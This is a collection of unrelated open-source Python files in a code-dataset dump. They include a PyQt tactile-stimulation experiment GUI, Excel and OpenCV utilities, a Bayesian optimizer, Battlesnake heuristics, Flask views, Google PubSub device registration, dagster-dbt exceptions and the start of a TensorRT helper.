'close_port':\n port = brush.findPort()\n if port is None:\n print('Could not find a port with an AxiDraw connected')\n else:\n print('Closing port', port)\n self.serial_port = brush.closePort(port)\n\n if msg[0] == 'hellofriend.mov':\n brush.sendEnableMotors(self.serial_port, 2)\n speed = msg[1]\n direction = msg[2]\n distance = msg[3]\n # print('Brushing at ' + str(speed) + ' cm/s')\n if direction == 'Left to Right':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n elif direction == 'Right to Left':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n\n # circular movement\n elif direction == 'CW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n elif direction == 'ACW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n\n brush.sendDisableMotors(self.serial_port)\n self.q_out.put('OK')\n\n\n# Queue params:\nq_to_ad = queue.Queue()\nq_from_ad = queue.Queue()\naxidraw = AxiDraw(q_to_ad, q_from_ad)\n\naxidraw.daemon = True\naxidraw.start()\n\nWorker.daemon = True\n\n\nclass secondWindow(QMainWindow):\n # VAS UI\n def __init__(self, parent=None):\n super(secondWindow, self).__init__()\n loadUi(\"gui/vas.ui\", self)\n\n self.vasSlider.valueChanged.connect(self.updateDisplay)\n self.vasSubmit.clicked.connect(self.getValues)\n\n def getValues(self):\n # Get values from Slider and print results in console\n # TODO: Store data and export (if exists: append to csv)\n print(self.vasSlider.value())\n # print(q_to_ad.put(['hellofriend.mov', trial, direction, distance])) #EXPORT\n\n self.close()\n\n def updateDisplay(self):\n # Update digital display as the sliders moves\n self.vasCurrent.display(self.vasSlider.value())\n\n\nclass MainUI(QMainWindow):\n # Main UI\n def __init__(self):\n super(MainUI, self).__init__()\n loadUi(\"gui/mainGui.ui\", self)\n\n # Threading neccesary for worker (another thread used in for loop during stimulation\n self.threadpool = QThreadPool()\n\n self.statusBar.showMessage('Ready')\n\n # bind buttons to functions\n self.loadExperiment.triggered.connect(self.loadExperimentAction)\n self.saveExperiment.triggered.connect(self.saveExperimentAction)\n self.loadSubject.triggered.connect(self.loadSubjectAction)\n self.saveSubject.triggered.connect(self.saveSubjectAction)\n self.ResetButton.clicked.connect(self.resetSubject)\n self.BeginButton.clicked.connect(self.startExperiment)\n self.ConnectButton.clicked.connect(self.connectDevice)\n self.actionExit.triggered.connect(QtWidgets.QApplication.quit)\n self.clearButton.clicked.connect(self.clearAction)\n self.clearConsole.clicked.connect(self.clearConsoleAction)\n\n def printToConsole(self, text):\n \"\"\"\n Print functions output into UI console (PlainText)\n :param self:\n :param text: text(str)\n \"\"\"\n\n self.ConsoleOutput.appendPlainText('- ' + text)\n self.ConsoleOutput.ensureCursorVisible()\n\n def loadExperimentAction(self):\n # load a experiment file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n data = pd.read_csv(filename[0], header=None)\n self.updateExperiment(data)\n\n def updateExperiment(self, data):\n \"\"\"\n Update experiment UI with loaded data\n :param self:\n :param data: incoming data from LoadExperimentAction function, python list\n \"\"\"\n self.movementPath.setCurrentText(data[1][0])\n self.bodySite.setCurrentText(data[1][1])\n self.movementDirection.setCurrentText(data[1][2])\n self.velocitiesInput.setText(data[1][3])\n self.distanceInput.setText(data[1][4])\n self.repetitionsInput.setText(data[1][5])\n self.intertrialIntput.setText(data[1][6])\n self.vastimeInput.setText(data[1][7])\n\n def saveExperimentAction(self):\n # save a experiment file\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Path\", \"Site\",\n \"Movement\", \"Velocity\",\n \"Distance\", \"Repetitions\",\n \"VasTime\", \"InterTime\"]\n dataToCsv = pd.DataFrame(data, index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def loadSubjectAction(self):\n # load a subject file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n\n data = pd.read_csv(filename[0], header=None)\n self.updateSubject(data)\n\n def saveSubjectAction(self):\n # save a subject file\n data = [self.subjectInput.displayText(),\n self.ageInput.displayText(),\n self.genderInput.currentText(),\n self.handInput.currentText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Subject\", \"Age\",\n \"Gender\", \"Handeness\"]\n dataToCsv = pd.DataFrame(data, index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def updateSubject(self, data):\n self.subjectInput.setText(data[1][0])\n self.ageInput.setText(data[1][1])\n self.genderInput.setCurrentText(data[1][2])\n self.handInput.setCurrentText(data[1][3])\n\n def resetSubject(self):\n self.subjectInput.setText(\"\")\n self.ageInput.setText(\"\")\n self.genderInput.setCurrentIndex(0)\n self.handInput.setCurrentIndex(0)\n\n def clearAction(self):\n self.movementPath.setCurrentIndex(0)\n self.bodySite.setCurrentIndex(0)\n self.movementDirection.setCurrentIndex(0)\n self.velocitiesInput.setText(\"\")\n self.distanceInput.setText(\"\")\n self.repetitionsInput.setText(\"\")\n self.intertrialIntput.setText(\"\")\n self.vastimeInput.setText(\"\")\n\n def clearConsoleAction(self):\n self.ConsoleOutput.clear()\n\n def connectDevice(self):\n q_to_ad.put('open_port')\n answer = q_from_ad.get()\n if answer[:3] == 'COM':\n # print(answer)\n # TODO: read all incoming PORTs more elegantly\n\n self.connectedBox.setCheckable(True)\n self.connectedBox.setChecked(True)\n\n self.poweredBox.setCheckable(True)\n self.poweredBox.setChecked(True)\n\n self.ConnectButton.setEnabled(False)\n\n self.connectedBox.setEnabled(False)\n self.poweredBox.setEnabled(False)\n\n def execute_brushing(self, progress_callback):\n \"\"\"\n new Thread! Execute trials and send signals to brush through Queue\n :param self\n :param progress_callback: Real-time feedback from worker\n \"\"\"\n self.BeginButton.setEnabled(False)\n trialsRnd = []\n data = self.getExperimentData()\n\n direction = data[2]\n trials = data[3].split(\";\")\n distance = int(data[4])\n reps = int(data[5])\n interTime = int(data[6])\n VasTime = int(data[7])\n\n totalTrials = len(trials) * reps\n trialCount = 1\n\n trials = [eval(i) for i in trials]\n\n for i in range(0, reps):\n trialsRnd.append(random.sample(trials, len(trials)))\n for cycle in trialsRnd:\n for trial in cycle:\n answer = None\n self.printToConsole('Brushing at ' + str(trial) + ' cm/s')\n # add from here to csv, combine with vas results?\n q_to_ad.put(['hellofriend.mov', trial, direction, distance])\n answer = q_from_ad.get()\n progress_callback.emit(totalTrials - trialCount)\n trialCount += 1\n \"\"\"\n flag1 = time.time()\n flag2 = time.time()\n \n while trialCount < totalTrials:\n if flag2 - flag1 >= VasTime:\n flag1 = flag2\n flag2 = time.time()\n trialCount += 1\n else:\n flag2 = time.time()\n else:\n \"\"\"\n time.sleep(interTime)\n self.BeginButton.setEnabled(True)\n return 'Done'\n\n def newWindow(self):\n self.w = secondWindow()\n self.w.show()\n\n def print_output(self, s):\n if s:\n print(s)\n\n def thread_complete(self):\n self.printToConsole(\"Tactile stimulation complete\")\n\n def progress_fn(self, n):\n self.printToConsole('Trials left: ' + str(n))\n self.newWindow()\n\n def startExperiment(self):\n if self.ConnectButton.isEnabled():\n self.printToConsole('MultiTAC is not connected, please connect')\n else:\n worker = Worker(self.execute_brushing)\n worker.signals.result.connect(self.print_output)\n worker.signals.finished.connect(self.thread_complete)\n worker.signals.progress.connect(self.progress_fn)\n # Execute\n self.threadpool.start(worker)\n\n def getExperimentData(self):\n # self.printToConsole('Starting Experiment')\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n return data\n\n\nif __name__:\n debugger = True\n\n if debugger:\n app = QApplication(sys.argv)\n qt_app = MainUI()\n qt_app.show()\n app.exec()\n","repo_name":"EdgardoCS/BrushGui","sub_path":"MultiTAC.py","file_name":"MultiTAC.py","file_ext":"py","file_size_in_byte":16898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2234729535","text":"from openpyxl import Workbook\r\nimport string\r\nimport os\r\n\r\nfile_name = []\r\nfolder = \"C:/Users/Turi/PycharmProjects/test\"\r\nfor file in os.listdir(folder):\r\n if file.endswith(\".txt\"):\r\n file_name.append(file)\r\n\r\n\r\nworkbook = Workbook()\r\nfor i in file_name:\r\n workbook.create_sheet(i)\r\n\r\nabc = string.ascii_uppercase\r\n\r\nfor txt_file in file_name:\r\n row = 1\r\n column = 0\r\n header = True\r\n sheet = workbook[txt_file]\r\n with open(txt_file, \"r\") as file:\r\n lines = file.readlines()\r\n for line in lines:\r\n line = line.split('|')\r\n if len(line) > 20 and line[1].startswith(\"P\") and header:\r\n for header_data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = header_data\r\n column += 1\r\n header = False\r\n row += 1\r\n if len(line) > 20 and line[1].startswith(\"3\"):\r\n column = 0\r\n for data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = data\r\n column += 1\r\n column = 0\r\n row += 1\r\n\r\nworkbook.save(filename=\"bence.xlsx\")\r\n\r\n","repo_name":"TurcsanyAdam/Bence_excell","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32335044162","text":"for _ in range(int(input())):\r\n coin = sorted(list(map(int, input().split()))[1:])\r\n flag = True\r\n\r\n for i in range(1, len(coin)):\r\n if coin[i - 1] * 2 > coin[i]:\r\n flag = False\r\n break\r\n\r\n print(f\"Denominations: \" + \" \".join(map(str, coin)))\r\n print(\"Good coin denominations!\" if flag else \"Bad coin denominations!\")\r\n print()","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/26350.py","file_name":"26350.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33130369456","text":"import numpy as np\n\nfrom ..bayes_opt import BayesianOptimization\nfrom ..bayes_opt.helpers import acq_max, UtilityFunction\nfrom random import random\nfrom sklearn.preprocessing import StandardScaler\nfrom ..other import random_sample\nimport datetime\n\ndef noop(*kargs, **kwargs):\n # stub function for bo\n return None\n\n\nclass BayesianOptimizer():\n def __init__(self, space, conf={}):\n conf = {\n **conf,\n 'pbounds': space, #conf bounds\n }\n self.space = space\n self.conf = conf\n#########conf contains acq, use; else use default\n self.acq = conf.get('acq', 'ei')\n self.kappa = conf.get('kappa', 2.576)\n self.xi = conf.get('xi', 0.0)\n self.history_data=np.loadtxt('memory_km/datasetforGP.txt')\n self.history_data_y=np.loadtxt('memory_km/dataset.txt')\n self.xx=self.history_data[:]\n self.yy=-self.history_data_y[:,32] # -y\n print('space=',self.space)\n x=self.xx[:1480,:] # wc 1310 pr 1225\n # print(x)\n # StandardScaler= x-mean/var normal\n standardscaler = StandardScaler()\n self.scaler=standardscaler.fit(x)\n x = self.scaler.transform(x)\n\n # print(x)\n\n try:\n del conf['acq'], conf['kappa'], conf['xi']\n except:\n pass\n #print(self.space)\n self.bo = BayesianOptimization(**self._make_config(conf))\n starttime1 = datetime.datetime.now()\n\n self.bo.gp.fit(x, self.yy)\n endtime1 = datetime.datetime.now()\n duringtime1 = endtime1 - starttime1\n\n print('GP model trained..time',duringtime1)\n # print('show make config:')\n # print(self._make_config(conf))\n\n def _make_config(self, conf):\n return {\n **conf,\n 'f': noop\n }\n\n def add_observation(self, ob):\n # ob: (x, y) while x is argument dict\n # _x:{'key1':v1,'key2':v2,.....}\n _x, y = ob\n # print('show ob_x, i.e, sampled_config_numeric:')\n # print(_x)\n # print('show ob.y, i.e, metric_result:')\n # print(y)\n # dict to tuple regarding keys in self.space\n x = []\n for k in self.space.keys():\n x.append(_x[k])\n# x=[conf1,conf2,...]\n # print(x,y)\n # add ob into bo space\n #\n # self.bo.space._Yview=[-240,-240,-121.41]\n try:\n print('bo space before add observation',self.bo.space)\n #space.add_observation(x, y) is define in the TargetSpace.py file\n self.bo.space.add_observation(x, y)\n except KeyError as e:\n # get exception message\n msg, = e.args\n raise Exception(msg)\n # print('show ob.space.X,only values no keys:')\n # print(self.bo.space.X)\n # print('show ob.space.Y:')\n # print(self.bo.space.Y)\n # XX=self.bo.space.X\n # YY=self.bo.space.Y\n # XX=self.xx\n # YY=self.yy\n\n # XX.append(self.bo.space.X)\n # YY.append(self.bo.space.Y)\n # print('XX and YY-----------')\n\n# todo operate in here!!\n# self.bo.gp.fit(XX,YY)\n\n\n def get_conf(self):\n acq = self.acq\n kappa = self.kappa\n xi = self.xi\n scaler=self.scaler\n # bo recalculates next best conf\n # codes below are adapted from implementation of bo.maximize\n\n # assert self.bo.space.Y is not None and len(\n # self.bo.space.Y) > 0, 'at least one observation is required before asking for next configuration'\n if self.bo.space.Y is None or len(self.bo.space.Y) == 0:\n x_max = self.bo.space.random_points(1)[0]\n else:\n\n print(' start find max')\n starttime = datetime.datetime.now()\n x_max = acq_max(\n ac=UtilityFunction(\n kind=acq,\n kappa=kappa,\n xi=xi,\n scaler=scaler\n ).utility,\n gp=self.bo.gp,\n scaler=self.scaler,\n y_max=self.bo.space.Y.max(),\n bounds=self.bo.space.bounds,\n random_state=self.bo.random_state,\n **self.bo._acqkw\n )\n\n print(' compelete find max')\n endtime = datetime.datetime.now()\n duringtime = endtime - starttime\n print(duringtime)\n\n # print('x_max=',x_max)\n # check if x_max repeats\n if x_max in self.bo.space:\n x_max = self.bo.space.random_points(1)[0]\n\n # print('show xmax from acqmax():')\n # print(x_max)\n return self._convert_to_dict(x_max)\n\n def _convert_to_dict(self, x_array):\n # print('show self.space, not self.bo.space, should be{'':()}:')\n # print(self.space)\n return dict(zip(self.space, x_array))\n\n\nclass ConfigedBayesianOptimizer(BayesianOptimizer):\n # Processing parameter space: Continuous and discrete\n def __init__(self, config, bo_conf={}):\n self._config = {**config}\n #print(self._config)\n bo_space = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range: # discrete ranged parameter\n bo_space[k] = (0, len(v_range)) # note: right-close range\n else:\n bo_space[k] = (v['min'], v['max'])\n #print(bo_space)\n #print(bo_conf)\n super().__init__(bo_space, bo_conf)\n\n # get conf and convert to legal config\n def get_conf(self):\n sample = super().get_conf()\n print('show sample from father\\'s get_conf:')\n print(sample)\n # first is continuous value, second is translated\n return sample, self._translate(sample)\n\n def random_sample(self):\n result = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range:\n result[k] = random() * len(v_range)\n else:\n minn, maxx = v.get('min'), v.get('max')\n result[k] = random() * (maxx - minn) + minn\n return result, self._translate(result)\n\n def _translate(self, sample):\n result = {}\n # orders in sample are the same as in _config dict\n # see: https://github.com/fmfn/BayesianOptimization/blob/d531dcab1d73729528afbffd9a9c47c067de5880/bayes_opt/target_space.py#L49\n # self.bounds = np.array(list(pbounds.values()), dtype=np.float)\n for sample_value, (k, v) in zip(sample.values(), self._config.items()):\n v_range = v.get('range')\n if v_range:\n try:\n index = int(sample_value)\n if index == len(v_range):\n index -= 1\n result[k] = v_range[index]\n except Exception as e:\n print('ERROR!')\n print(k, sample_value)\n print(v_range)\n raise e\n else:\n is_float = v.get('float', False)\n result[k] = sample_value if is_float else int(sample_value)\n #print(result)\n return result\n","repo_name":"wiluen/DeepCAT","sub_path":"test_kit/ultimate/lib/optimizer/bo.py","file_name":"bo.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72177412648","text":"#Trackbar find the specific Value HSV\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef callback(x):\r\n pass\r\n\r\ncv2.namedWindow('Input_Range')\r\n\r\nilowH = 0\r\nihighH = 360\r\n\r\nilowS = 0\r\nihighS = 255\r\n\r\nilowV = 0\r\nihighV = 255\r\n\r\n#create trackbars for color change\r\ncv2.createTrackbar('low_HUE','Input_Range',ilowH,360,callback)\r\ncv2.createTrackbar('high_HUE','Input_Range',ihighH,360,callback)\r\n\r\ncv2.createTrackbar('low_Saturate','Input_Range',ilowS,255,callback)\r\ncv2.createTrackbar('high_Saturate','Input_Range',ihighS,255,callback)\r\n\r\ncv2.createTrackbar('low_Intensity','Input_Range',ilowV,255,callback)\r\ncv2.createTrackbar('high_Intensity','Input_Range',ihighV,255,callback)\r\n\r\nfile_path = 'Board.jpg'\r\n\r\nwhile(1):\r\n cap = cv2.imread(file_path,1)\r\n \r\n #get Trackbar positions\r\n ilowH = cv2.getTrackbarPos('low_HUE','Input_Range')\r\n ihighH = cv2.getTrackbarPos('high_HUE','Input_Range')\r\n ilowS = cv2.getTrackbarPos('low_Saturate','Input_Range')\r\n ihighS = cv2.getTrackbarPos('high_Saturate','Input_Range')\r\n ilowV = cv2.getTrackbarPos('low_Intensity','Input_Range')\r\n ihighV = cv2.getTrackbarPos('high_Intensity','Input_Range')\r\n \r\n hsv = cv2.cvtColor(cap, cv2.COLOR_BGR2HSV)\r\n cv2.imshow('RGB',cap)\r\n lower_hsv = np.array([ilowH,ilowS,ilowV])\r\n higher_hsv = np.array([ihighH,ihighS,ihighV])\r\n mask = cv2.inRange(hsv,lower_hsv,higher_hsv)\r\n #cv2.imshow('mask',mask)\r\n \r\n cap = cv2.bitwise_and(cap,cap,mask=mask)\r\n \r\n #show Thresholded image\r\n cv2.imshow('cap',cap)\r\n \r\n #print(ilowH,ilowS,ilowV)\r\n if(cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\ncv2.destroyAllWindows()\r\n","repo_name":"ema2541/WDProject_RobotArm","sub_path":"02_find_upper_lower_color.py","file_name":"02_find_upper_lower_color.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74479463529","text":"import numpy as np\nimport random\n\nclass MyBattlesnakeHeuristics:\n '''\n The BattlesnakeHeuristics class allows you to define handcrafted rules of the snake.\n '''\n FOOD_INDEX = 0\n def __init__(self):\n pass\n \n def go_to_food_if_close(self, state, json):\n '''\n Example heuristic to move towards food if it's close to you.\n '''\n # Get the position of the snake head\n your_snake_body = json[\"you\"][\"body\"]\n i, j = your_snake_body[0][\"y\"], your_snake_body[0][\"x\"]\n \n # Set food_direction towards food\n food = state[:, :, self.FOOD_INDEX]\n \n # Note that there is a -1 border around state so i = i + 1, j = j + 1\n if -1 in state:\n i, j = i+1, j+1\n \n food_direction = None\n if food[i-1, j] == 1:\n food_direction = 0 # up\n if food[i+1, j] == 1:\n food_direction = 1 # down\n if food[i, j-1] == 1:\n food_direction = 2 # left\n if food[i, j+1] == 1:\n food_direction = 3 # right\n return food_direction\n \n def run(self, state, snake_id, turn_count, health, json, action):\n '''\n The main function of the heuristics.\n \n Parameters:\n -----------\n `state`: np.array of size (map_size[0]+2, map_size[1]+2, 1+number_of_snakes)\n Provides the current observation of the gym.\n Your target snake is state[:, :, snake_id+1]\n \n `snake_id`: int\n Indicates the id where id \\in [0...number_of_snakes]\n \n `turn_count`: int\n Indicates the number of elapsed turns\n \n `health`: dict\n Indicates the health of all snakes in the form of {int: snake_id: int:health}\n \n `json`: dict\n Provides the same information as above, in the same format as the battlesnake engine.\n\n `action`: np.array of size 4\n The qvalues of the actions calculated. The 4 values correspond to [up, down, left, right]\n '''\n log_string = \"\"\n # The default `best_action` to take is the one that provides has the largest Q value.\n # If you think of something else, you can edit how `best_action` is calculated\n best_action = int(np.argmax(action))\n \n # Example heuristics to eat food that you are close to.\n if health[snake_id] < 30:\n food_direction = self.go_to_food_if_close(state, json)\n if food_direction:\n best_action = food_direction\n log_string = \"Went to food if close.\"\n \n\n # TO DO, add your own heuristics\n \n assert best_action in [0, 1, 2, 3], \"{} is not a valid action.\".format(best_action)\n return best_action, log_string","repo_name":"awslabs/sagemaker-battlesnake-ai","sub_path":"source/MXNetEnv/inference/inference_src/battlesnake_heuristics.py","file_name":"battlesnake_heuristics.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"} +{"seq_id":"28447897329","text":"import datetime\n\nfrom flask import (Blueprint, redirect, url_for, current_app,\n request, flash, render_template)\n\nfrom web.extensions import db\nfrom web.utils.helpers import (randomizer)\nfrom web.utils.helpers import (render_markup)\nfrom web.index.models import (posts, technologies, solutions, Randomizer)\n\nindex = Blueprint(\"index\", __name__)\n\n@index.route('/')\ndef _index():\n conf = {\n 'title' : 'Search Engine',\n 'slogan': 'Not Google.',\n\n 'sidebar': True,\n 'footer': True,\n 'rand': randomizer(),\n 'user_level': 2,\n }\n\n markup = render_markup(\"\"\"\n# Chapter #\n\n## Section ##\n\n* Item 1\n* Item 2\n \"\"\")\n\n return render_template('index/index.html', \n conf = conf,\n solutions = solutions,\n technologies = technologies,\n posts = posts,\n m = markup,\n c = request.headers.get('CF-IPCountry'))\n\n@index.route('/plans')\ndef plans():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/plans.html', conf=conf)\n\n@index.route('/spider')\ndef spider():\n conf = {\n 'title' : 'web',\n 'slogan': 'The defining IT solution.',\n\n 'sidebar': False,\n 'footer': False,\n 'rand': None,\n 'user_level': 5,\n }\n\n return render_template('index/spider.html', conf=conf)","repo_name":"hoytnix/spidey","sub_path":"httpd/web/index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3272235643","text":"import base64\nfrom operator import sub\nfrom google.cloud import firestore\nfrom google.cloud import pubsub_v1\nimport json\n\n# Declare the project ID\nproject_id = \"niyoproject-306620\"\n\n# Connect to Firestore DB (Native Mode)\ndb = firestore.Client(project=project_id)\n# Set active collection to user\nreaders = db.collection(u'readers')\n\n# Initiate Publisher and Subscriber for PubSub\npublisher = pubsub_v1.PublisherClient()\nsubscriber = pubsub_v1.SubscriberClient()\nsubscriber_web = pubsub_v1.SubscriberClient()\n\ndef register_device(reader_id):\n # First, create an entry on Firestore\n data = {\n u'action': u'none',\n u'amount': 0\n }\n readers.document(reader_id).set(data)\n\n # Then, create a topic in PubSub with the reader_id\n topic_id = reader_id\n topic_path = publisher.topic_path(project_id, topic_id)\n if topic_path not in [topic.name for topic in publisher.list_topics(request = {'project': f'projects/{project_id}'})]:\n topic = publisher.create_topic(request={\"name\": topic_path})\n print(f'Topic {topic_path} created successfully!')\n subscription_path = subscriber.subscription_path(project_id, topic_id)\n subscription_path_web = subscriber_web.subscription_path(project_id, topic_id + \"_web\")\n if subscription_path not in [subs for subs in publisher.list_topic_subscriptions(request = {'topic': topic_path})]:\n with subscriber:\n subscription = subscriber.create_subscription(\n request = {'name': subscription_path, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path} created successfully!')\n with subscriber_web:\n subscription_web = subscriber_web.create_subscription(\n request = {'name': subscription_path_web, 'topic': topic_path, 'enable_exactly_once_delivery': True}\n )\n print(f'Subscription {subscription_path_web} created successfully!')\n else:\n print(f'Subscription {subscription_path} or {subscription_path_web} already exists, skipping!')\n else:\n print(f'Topic {topic_path} already exists, skipping!')\n \n\n\n\ndef main(event, context):\n \"\"\"Triggered from a message on a Cloud Pub/Sub topic.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n data = json.loads(pubsub_message)\n\n print(\"Reader ID:\" + str(data[\"reader_id\"]))\n\n register_device(data[\"reader_id\"])\n","repo_name":"xprilion/KolPay","sub_path":"cloud_functions/register-device.py","file_name":"register-device.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"9892371367","text":"import warnings\nfrom abc import ABC\nfrom typing import Any, Mapping, Optional, Sequence\n\nfrom dagster import (\n DagsterInvariantViolationError,\n Failure,\n MetadataValue,\n _check as check,\n)\n\n\nclass DagsterDbtError(Failure, ABC):\n \"\"\"The base exception of the ``dagster-dbt`` library.\"\"\"\n\n\nclass DagsterDbtCliUnexpectedOutputError(DagsterDbtError):\n \"\"\"Represents an error when parsing the output of a dbt CLI command.\"\"\"\n\n invalid_line_nos: Sequence[int]\n\n def __init__(self, invalid_line_nos: Sequence[int]):\n check.sequence_param(invalid_line_nos, \"invalid_line_nos\", int)\n line_nos_str = \", \".join(map(str, invalid_line_nos))\n description = f\"dbt CLI emitted unexpected output on lines {line_nos_str}\"\n metadata = {\n \"Invalid CLI Output Line Numbers\": MetadataValue.json({\"line_nos\": invalid_line_nos})\n }\n super().__init__(description, metadata=metadata)\n self.invalid_line_nos = invalid_line_nos\n\n\nclass DagsterDbtCliRuntimeError(DagsterDbtError, ABC):\n \"\"\"Represents an error while executing a dbt CLI command.\"\"\"\n\n def __init__(\n self,\n description: str,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n if logs is not None:\n warnings.warn(\n \"`logs` is a deprecated argument to DagsterDbtCliRuntimeError and will be discarded\"\n )\n if raw_output is not None:\n warnings.warn(\n \"`raw_output` is a deprecated argument to DagsterDbtCliRuntimeError and will be\"\n \" discarded\"\n )\n metadata = {\"Parsed CLI Messages\": \"\\n\".join(messages or [])}\n super().__init__(description, metadata=metadata)\n\n\nclass DagsterDbtCliHandledRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a model error reported by the dbt CLI at runtime (return code 1).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\"Handled error in the dbt CLI (return code 1)\", logs, raw_output, messages)\n\n\nclass DagsterDbtCliFatalRuntimeError(DagsterDbtCliRuntimeError):\n \"\"\"Represents a fatal error in the dbt CLI (return code 2).\"\"\"\n\n def __init__(\n self,\n logs: Optional[Sequence[Mapping[str, Any]]] = None,\n raw_output: Optional[str] = None,\n messages: Optional[Sequence[str]] = None,\n ):\n super().__init__(\n \"Fatal error in the dbt CLI (return code 2): \" + \" \".join(messages or []),\n logs,\n raw_output,\n messages,\n )\n\n\nclass DagsterDbtCliOutputsNotFoundError(DagsterDbtError):\n \"\"\"Represents a problem in finding the ``target/run_results.json`` artifact when executing a dbt\n CLI command.\n\n For more details on ``target/run_results.json``, see\n https://docs.getdbt.com/reference/dbt-artifacts#run_resultsjson.\n \"\"\"\n\n def __init__(self, path: str):\n super().__init__(f\"Expected to find file at path {path}\")\n\n\nclass DagsterDbtCloudJobInvariantViolationError(DagsterDbtError, DagsterInvariantViolationError):\n \"\"\"Represents an error when a dbt Cloud job is not supported by the ``dagster-dbt`` library.\"\"\"\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"20612446391","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys\nimport traceback\n\ntry:\n import tensorrt as trt # noqa pylint: disable=W0611 pylint: disable=W0611\n # Get TensorRT version number.\n [NV_TENSORRT_MAJOR, NV_TENSORRT_MINOR, NV_TENSORRT_PATCH, _] = [\n int(item) for item\n in trt.__version__.split(\".\")\n ]\n trt_available = True\nexcept Exception as e:\n logger = logging.getLogger(__name__)\n logger.warning(\n \"Failed to import TensorRT package, exporting TLT to a TensorRT engine \"\n \"will not be available.\"\n )\n trt_available = False\n\n\n# Default TensorRT parameters.\nDEFAULT_MAX_WORKSPACE_SIZE = 2 * (1 << 30)\nDEFAULT_MAX_BATCH_SIZE = 1\n\n\n# Define logger.\nlogger = logging.getLogger(__name__)\n\n\ndef _create_tensorrt_logger(verbose=False):\n \"\"\"Create a TensorRT logger.\n\n Args:\n verbose(bool): Flag to set logger as verbose or not.\n Return:\n tensorrt_logger(trt.infer.ConsoleLogger): TensorRT console logger object.\n \"\"\"\n if str(os.getenv('SUPPRES_VERBOSE_LOGGING', '0')) == '1':\n # Do not print any warnings in TLT docker\n trt_verbosity = trt.Logger.Severity.ERROR\n elif verbose:\n trt_verbosity = trt.Logger.INFO\n else:\n trt_verbosity = trt.Logger.WARNING\n tensorrt_logger = trt.Logger(trt_verbosity)\n return 